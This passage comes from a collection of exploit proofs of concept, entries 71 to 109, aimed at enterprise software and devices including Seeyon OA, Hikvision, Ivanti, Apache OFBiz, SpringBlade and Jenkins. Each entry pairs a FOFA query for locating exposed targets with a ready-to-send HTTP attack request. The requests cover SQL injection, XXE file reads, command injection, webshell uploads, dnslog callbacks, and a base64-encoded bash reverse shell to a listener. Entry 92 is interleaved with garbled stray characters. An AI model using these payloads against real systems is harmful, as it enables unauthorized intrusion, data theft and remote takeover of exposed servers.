SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD


75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD


84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp


86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php


89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

) x3 Z  |& J+ o9 `: S8 n# P, k6 d: e7 V92. 海康威视运行管理中心session命令执行
2 X' z% o1 N) K! ]8 qFastjson命令执行; ]( J0 l& ]5 T( t6 k& v  c  ?
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"6 A8 ?  O4 s5 h- J# Q
POST /center/api/session HTTP/1.1- e  Y( W9 D; C
Host:
2 l5 v# l% S! L( m$ ?Accept: application/json, text/plain, */*
' [7 v8 P, a6 {3 j1 i7 ]( SAccept-Encoding: gzip, deflate" O- r9 G% h+ O; g, Y* d! F' n* Q# y
X-Requested-With: XMLHttpRequest
6 E$ ]- |' J# K$ s; @6 a6 e; PContent-Type: application/json;charset=UTF-8; C  v) h" g7 z7 w/ `
X-Language-Type: zh_CN- v7 u6 B0 h" x% R
Testcmd: echo test
0 \  g0 l. D) {9 Q+ A, i0 C, GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.366 @9 G+ U; R! W: ~& R8 G9 W) n
Accept-Language: zh-CN,zh;q=0.9
" b7 H' R" H8 ~/ a- }" CContent-Length: 5778
: r7 X- R! i) e+ W; W+ G+ W. T0 Z: s4 J; q- ?5 S7 r
PAYLOAD
4 H. B. U9 O7 q, L
: ]6 P5 ^5 L' M! n! l+ T
& _" {1 x3 C* c- |93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 \! w, O! X3 Y1 J
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
